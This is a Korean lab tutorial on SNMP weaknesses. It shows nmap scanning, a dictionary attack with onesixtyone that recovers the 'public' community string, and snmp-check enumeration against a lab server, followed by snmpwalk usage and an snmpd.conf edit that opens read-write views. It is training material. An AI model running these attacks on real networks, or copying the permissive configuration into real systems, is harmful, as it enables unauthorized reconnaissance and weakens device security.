SNMP Sniffing 공격 onesixtyone(brutus-attack)

SNMP 취약점

snmp의 취약점을 이용한 공격기법과 대응방안 [gusxodnjs].pdf

(SNMP의 취약점을 이용한 대응방안 - 동서대 현태원)

SNMP(Simple Network Management Protocol) 네트워크 망을 관리하는데 있어서 편이를 가져다 준다.

그러나 편리함에 비해 보안의 관점에서 볼 때는 그리 좋지만은 않은게 사실이다.

SNMP 중앙관리등 네트워크 망을 관리 목적으로 만들어진 프로토콜로, 간단한 명령으로 원격 시스템의

CPU정보,인터페이스 트래픽등 자료를 수집하여 모니터링할 수 있다.

취약점 : 평문형태로 이루어져 있다.

SNMP 관련 포트들

7/udp, 161/tcp, 161/udp, 162/tcp, 162/udp, 199/tcp, 391/tcp, 391/udp, 705/tcp, 1993/tcp, 1993/udp

현재 NMS 사용용도 리소스 모니터링

SNMP 취약점에 대해서 배워 보자.

[참고] SNMP 취약점에 대한 URL

http://myungin.tistory.com/entry/11-NMSSNMPTFTP-SNMP-%EA%B3%B5%EA%B2%A9-%EA%B8%B0%EB%B2%95

http://semidntmd.tistory.com/entry/%ED%8F%AC%ED%8A%B8%EC%8A%A4%EC%BA%90%EB%8B%9D%EA%B3%BC-SNMP-%ED%94%84%EB%A1%9C%ED%86%A0%EC%BD%9C-%EC%B7%A8%EC%95%BD%EC%A0%90

SNMP RFC 문서(http://www.ietf.org/rfc/rfcNNNN.txt)

- RFC 2578 ~ 2580

■ 사용시스템

- linux200 (SNMP Server)

- kaliLinux (SNMP Client)

■ 사용하는 툴

- snmpcheck (information check)

- onesixtyone(brutus-attack)

(if window) 윈도우 SNMP Server를 사용하는 경우

c:\> netstat -a | findstr 161

실행 > services.msc > SNMP 서비스 동작 확인

(if linux) 리눅스 SNMP Server를 사용하는 경우

# rpm -qa | grep snmp

# yum -y install net-snmp net-snmp-libs net-snmp-utils

# chkconfig --list | grep snmp (#chkconfig --list snmpd)

# chkconfig snmpd on

# service snmpd restart

# chkconfig snmptrapd on

# service snmptrapd restart

(KaliLinux)

① 서비스 포트 스캐닝

# nmap -sU -p 161 192.168.20.200 snmp demon port 161 / -sU UDP scan

Starting Nmap 6.46 ( http://nmap.org ) at 2015-04-17 13:44 KST

Nmap scan report for 192.168.20.200

Host is up (0.00066s latency).

PORT STATE SERVICE

161/udp open snmp

MAC Address: 00:0C:29:E0:2C:6F (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.88 seconds

-> 만약 161번 포트가 closed 되어 있는 경우에는 다음과 같은 작업을 수행한다.

(Linux)

# yum -y install net-snmp net-snmp-libs net-snmp-utils

# chkconfig --list | grep snmp

# chkconfig snmpd on

# chkconfig snmptrapd on

# service snmpd restart

# service snmptrapd restart

② 사전 파일 대입 공격(onesixtyone 툴 사용) Linux200을 대상으로 Dictionary 공격 실시(툴 :onesixtyone)

# wireshark &

# onesixtyone

-----------------------------------------------------

onesixtyone 0.3.2 [options] <host> <community>

-c <communityfile> file with community names to try

-i <inputfile> file with target hosts

-o <outputfile> output log

-d debug mode, use twice for more information

-w n wait n milliseconds (1/1000 of a second) between sending packets (default 10)

-q quiet mode, do not print log to stdout, use with -l

examples: ./s -c dict.txt 192.168.4.1 public

./s -c dict.txt -i hosts -o my.log -w 100

-----------------------------------------------------

# cd /usr/share/doc/onesixtyone

# ls ; cat dict.txt

README changelog.Debian.gz changelog.gz copyright dict.txt

# egrep '(public|private)' dict.txt

private

public

# onesixtyone -c dict.txt 192.168.20.200 Linux200을 대상으로 SNMP스니핑

Scanning 1 hosts, 49 communities

192.168.20.200 [public] Linux linux200.example.com 2.6.18-348.el5 #1 SMP Tue Jan 8 17:57:28 EST 2013 i686

-> 과정을 wireshark로 분석한다.

-> communication string 을 public으로 사용한다는것을 알수 있다.

[참고] Community string을 얻어내기 위한 방법

- Default community string(public, private)

- Sniffing (community string 평문으로 전달)

- Dict/BruteForce Attack

③ 시스템의 주요 정보 확인(snmpenum)

KaliLinux 1.x) snmpcheck CMD

KaliLinux 2.x) snmp-check CMD

# snmp-check -t 192.168.20.200 -c public -p 161

snmpcheck v1.8 - SNMP enumerator

[*] Try to connect to 192.168.20.200

[*] Connected to 192.168.20.200

[*] Starting enumeration at 2015-04-17 13:53:29

[*] System information

------------------------------------------------------------------------------------

Hostname : linux200.example.com

Description : Linux linux200.example.com 2.6.18-348.el5 #1 SMP Tue Jan 8 17:57:28 EST 2013 i686

Uptime system : 2 hours, 28:36.43

Uptime SNMP daemon : 9 minutes, 58.91

Contact : Root <root@localhost> (configure /etc/snmp/snmp.local.conf)

Location : Unknown (edit /etc/snmp/snmpd.conf)

Motd : -

[*] Network information

------------------------------------------------------------------------------------

IP forwarding enabled : -

Default TTL : -

TCP segments received : -

TCP segments sent : -

TCP segments retrans. : -

Input datagrams : -

Delivered datagrams : -

Output datagrams : -

[*] Enumerated 192.168.20.200 in 0.12 seconds

Signal USR1 received in thread 1, but no signal handler set. at /usr/bin/snmpcheck line 230.

SNMP 관련 명령어를 배워보자.

(linux200)

■ snmp 관련 명령어 사용법

(snmpget = snmpwalk)

# snmpwalk -v1 -c public localhost .1

# snmpwalk -v1 -c public localhost system

# snmptranslate -Tl 출력폼을 목록형태로

# snmptranslate -Tp 출력폼을 트리구조형태로

OID값을 출력

# snmptranslate -Tl > /test/mibtree.txt 목록형태 출력내용을 파일로 저장

# cat /test/mibtree.txt | egrep '(Swap|mem)'

# snmpwalk -v1 -c public localhost .1.3.6.1.4.1.2021.4.4

# snmpwalk -v1 -c public localhost .1.3.6.1.4.1.2021.4.6

# snmpwalk -v1 -c public localhost .1

iso.3.6.1.2.1.1.1.0 = STRING: "Linux linux249.example.com 2.6.18-348.el5 #1 SMP Tue Jan 8 17:57:28 EST 2013 i686"

iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10

iso.3.6.1.2.1.1.3.0 = Timeticks: (154881) 0:25:48.81

iso.3.6.1.2.1.1.4.0 = STRING: "Root <root@localhost> (configure /etc/snmp/snmp.local.conf)"

iso.3.6.1.2.1.1.5.0 = STRING: "linux249.example.com"

iso.3.6.1.2.1.1.6.0 = STRING: "Unknown (edit /etc/snmp/snmpd.conf)"

iso.3.6.1.2.1.1.8.0 = Timeticks: (2) 0:00:00.02

iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.1

iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.2.1.49

iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.2.1.4

iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.2.1.50

iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.6.3.16.2.2.1

iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.6.3.10.3.1.1

iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.6.3.11.3.1.1

iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.6.3.15.2.1.1

iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The MIB module for SNMPv2 entities"

iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The MIB module for managing TCP implementations"

iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The MIB module for managing IP and ICMP implementations"

iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for managing UDP implementations"

iso.3.6.1.2.1.1.9.1.3.5 = STRING: "View-based Access Control Model for SNMP."

iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The SNMP Management Architecture MIB."

iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB for Message Processing and Dispatching."

iso.3.6.1.2.1.1.9.1.3.8 = STRING: "The management information definitions for the SNMP User-based Security Model."

iso.3.6.1.2.1.1.9.1.4.1 = Timeticks: (2) 0:00:00.02

iso.3.6.1.2.1.1.9.1.4.2 = Timeticks: (2) 0:00:00.02

iso.3.6.1.2.1.1.9.1.4.3 = Timeticks: (2) 0:00:00.02

iso.3.6.1.2.1.1.9.1.4.4 = Timeticks: (2) 0:00:00.02

iso.3.6.1.2.1.1.9.1.4.5 = Timeticks: (2) 0:00:00.02

iso.3.6.1.2.1.1.9.1.4.6 = Timeticks: (2) 0:00:00.02

iso.3.6.1.2.1.1.9.1.4.7 = Timeticks: (2) 0:00:00.02

iso.3.6.1.2.1.1.9.1.4.8 = Timeticks: (2) 0:00:00.02

iso.3.6.1.2.1.25.1.1.0 = Timeticks: (1667931) 4:37:59.31

End of MIB

# snmptranslate -Tl

..... (중략) .....

.iso(1).org(3).dod(6).internet(1).snmpV2(6).snmpModules(3).snmpCommunityMIB(18).snmpCommunityMIBConformance(2)

.iso(1).org(3).dod(6).internet(1).snmpV2(6).snmpModules(3).snmpCommunityMIB(18).snmpCommunityMIBConformance(2).snmpCommunityMIBCompliances(1)

.iso(1).org(3).dod(6).internet(1).snmpV2(6).snmpModules(3).snmpCommunityMIB(18).snmpCommunityMIBConformance(2).snmpCommunityMIBCompliances(1).snmpCommunityMIBCompliance(1)

.iso(1).org(3).dod(6).internet(1).snmpV2(6).snmpModules(3).snmpCommunityMIB(18).snmpCommunityMIBConformance(2).snmpCommunityMIBCompliances(1).snmpProxyTrapForwardCompliance(2)

.iso(1).org(3).dod(6).internet(1).snmpV2(6).snmpModules(3).snmpCommunityMIB(18).snmpCommunityMIBConformance(2).snmpCommunityMIBGroups(2)

.iso(1).org(3).dod(6).internet(1).snmpV2(6).snmpModules(3).snmpCommunityMIB(18).snmpCommunityMIBConformance(2).snmpCommunityMIBGroups(2).snmpCommunityGroup(1)

.iso(1).org(3).dod(6).internet(1).snmpV2(6).snmpModules(3).snmpCommunityMIB(18).snmpCommunityMIBConformance(2).snmpCommunityMIBGroups(2).snmpProxyTrapForwardGroup(3)

.iso(1).org(3).dod(6).internet(1).snmpV2(6).snmpModules(3).snmpv2tm(19)

.ccitt(0).zeroDotZero(0)

# snmptranslate -Tp

+--iso(1)

+--org(3)

+--dod(6)

+--internet(1)

+--directory(1)

+--mgmt(2)

| |

| +--mib-2(1)

| |

| +--system(1)

| | |

| | +-- -R-- String sysDescr(1)

| | | Textual Convention: DisplayString

| | | Size: 0..255

| | +-- -R-- ObjID sysObjectID(2)

| | +-- -R-- TimeTicks sysUpTime(3)

| | | |

| | | +--sysUpTimeInstance(0)

| | |

..... (중략) .....

# mkdir -p /test && cd /test

# snmptranslate -Tl > /test/mibtree.txt

# cat /test/mibtree.txt | egrep '(Swap|mem)'

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memIndex(1)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memErrorName(2)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memTotalSwap(3)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memAvailSwap(4)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memTotalReal(5)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memAvailReal(6)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memTotalSwapTXT(7)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memAvailSwapTXT(8)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memTotalRealTXT(9)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memAvailRealTXT(10)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memTotalFree(11)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memMinimumSwap(12)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memShared(13)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memBuffer(14)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memCached(15)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memSwapError(100)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memSwapErrorMsg(101)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).systemStats(11).ssSwapIn(3)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).systemStats(11).ssSwapOut(4)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).systemStats(11).ssRawSwapIn(62)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).systemStats(11).ssRawSwapOut(63)

(간단한 테스트)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memTotalReal(5)

# snmpwalk -v 1 -c public localhost .1.3.6.1.4.1.2021.4.5

(정상적인 화면)

UCD-SNMP-MIB::memTotalReal.0 = INTEGER: 1034504

(정상이 아닌 화면)

End of MIB

(linux200) 정보가 보여질 수 있도록 설정

# cd /etc/snmp

# ls

snmpd.conf

# cp -p snmpd.conf snmpd.conf.orig

# vi snmpd.conf

:set nu

:38,62s/^/#-->/ (:38,62s/^#-->//)

110~151 주석 제거

110 # First, map the community name "public" into a "security name"

111 # sec.name source community

112 com2sec notConfigUser default public

113

114 # Second, map the security name into a group name:

115 # groupName securityModel securityName

116 group notConfigGroup v1 notConfigUser

117 group notConfigGroup v2c notConfigUser

118

119 # Third, create a view for us to let the group have rights to:

120 # Open up the whole tree for ro, make the RFC 1213 required ones rw.

121 # name incl/excl subtree mask(optional)

122 view roview included .1

123 view rwview included system.sysContact

124 view rwview included system.sysName

125 view rwview included system.sysLocation

126 view rwview included interfaces.ifTable.ifEntry.ifAdminStatus

127 view rwview included at.atTable.atEntry.atPhysAddress

128 view rwview included at.atTable.atEntry.atNetAddress

129 view rwview included ip.ipForwarding

130 view rwview included ip.ipDefaultTTL

131 view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteDest

132 view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteIfIndex

133 view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteMetric1

134 view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteMetric2

135 view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteMetric3

136 view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteMetric4

137 view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteType

138 view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteAge

139 view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteMask

140 view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteMetric5

141 view rwview included ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaIfIndex

142 view rwview included ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaPhysAddress

143 view rwview included ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaNetAddress

144 view rwview included ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaType

145 view rwview included tcp.tcpConnTable.tcpConnEntry.tcpConnState

146 view rwview included egp.egpNeighTable.egpNeighEntry.egpNeighEventTrigger

147 view rwview included snmp.snmpEnableAuthenTraps

148

149 # Finally, grant the group read-only access to the systemview view.

150 # group context sec.model sec.level prefix read write notif

151 access notConfigGroup "" any noauth exact roview rwview none

..... (중략) .....

# service snmpd restart

Stopping snmpd: [ OK ]

Starting snmpd: [ OK ]

# cat /test/mibtree.txt | egrep '(Swap|memory)'

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memIndex(1)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memErrorName(2)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memTotalSwap(3)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memAvailSwap(4)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memTotalReal(5)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memAvailReal(6)